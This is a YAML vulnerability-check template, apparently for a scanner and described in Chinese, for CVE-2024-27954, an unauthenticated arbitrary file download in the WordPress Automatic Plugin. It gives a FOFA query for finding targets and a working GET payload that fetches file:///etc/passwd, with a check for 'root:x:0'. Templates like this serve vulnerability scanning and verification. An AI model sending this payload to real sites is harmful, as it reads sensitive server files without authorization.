product: WordPress
vName: WordPress Automatic Plugin任意文件下载
type: 文件读取
vID:
  - CVE-2024-27954
level: 3
vDesc: WordPress Automatic Plugin 是一个WordPress插件，可以帮助用户自动化他们的WordPress网站内容更新。该插件可以从各种来源自动抓取内容，例如RSS Feeds、eBay、Amazon、YouTube等，并将这些内容发布到您的WordPress网站上。WordPress Automatic Plugin 小于 3.92.1 的版本存在任意文件下载漏洞，未授权的攻击者可以通过该漏洞下载服务器的任意文件，从而获取大量敏感信息。
version: ''
note: ''
search:
  FOFA: app="WordPress"
protocol: http
link: https://blog.csdn.net/2301_78399639/article/details/137730738
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /?p=3232&wp_automatic=download&link=file:///etc/passwd
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'root:x:0'
            logic: and